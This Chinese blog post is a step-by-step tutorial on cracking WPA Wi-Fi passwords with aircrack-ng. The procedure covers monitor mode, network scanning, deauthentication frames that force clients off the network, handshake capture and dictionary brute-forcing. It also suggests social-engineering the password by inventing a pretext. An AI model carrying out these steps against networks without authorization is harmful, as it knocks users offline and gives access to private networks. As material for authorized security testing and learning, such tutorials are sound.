版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/walkeryudev/article/details/76164130
无线渗透试的工具有很多,在windows下和Linux下的工具各有千秋,因在windows下的工具基本都是图形界面,操作起来比较直观易懂,在此就不再做过多介绍,本方重点介绍在linux下的一种通用的方法。
首先讲一下现行无线渗透试的一般方法和原理。
目前无线渗透试的两种方法:1、抓握手包,跑包。2、通过WPS进行跑pin码
当然第2种方法是要求路由器开启了wps功能。并且要求路由器没有设置pin防护,其它的方法如路由器漏洞等不在此讨论范围内。
WEP方式认证的路由器已经很少了,而且这种认证方式不但非常不安全且绝对可破,不再讲解,本文只讲WPA认证方式的渗透方法。
其实最有效的取得密码的方法是直接编个理由过去问!(社工)
原理:抓到的包中有密码的密文,做暴力跑包即可。
工具:aircrack-ng工具包(kali内置),一个支持监听模式的无线网卡。
第一步:开启无线网卡的监听模式。
这一步首先你的系统要识别你的无线网卡。
使用
ifconfig -a
命令查看你的网卡叫什么名字。比如叫wlan0
使用
ifconfig wlan0 up
激活你的无线网卡。
使用
airmon-ng check kill
结束系统中可能的干扰进程。
使用
airmon-ng start wlan0
开启你网卡的监听模式。并记住监听模式的名字。
第二步:监听周围wifi状态,选择要破解的无线路由器
使用
airodump-ng wlan0mon
开始监听
第三步:针对要要破解的wifi重新开启一个监听记录,发送断开命令,等待客户端重新连接时监听密码包。
airodump-ng -w 文件名(自己起一个名,用来保存监听到的数据) -c 监听频道 wlan0mon
打开另一个shell使用
aireplay-ng -0 1 -a 路由器的MAC地址 -c 客户端的MAC地址 wlan0mon
强制断开连 接到路由器的设备,以便在它再次连接时捕获它的认证包。
看看原来的airodump-ng的窗口是否在右上解提示有WPA handshake监听到
第四步:跑包测试加密的无线密码
aircrack-ng -w 准备好的密码字典 捕获到的数据包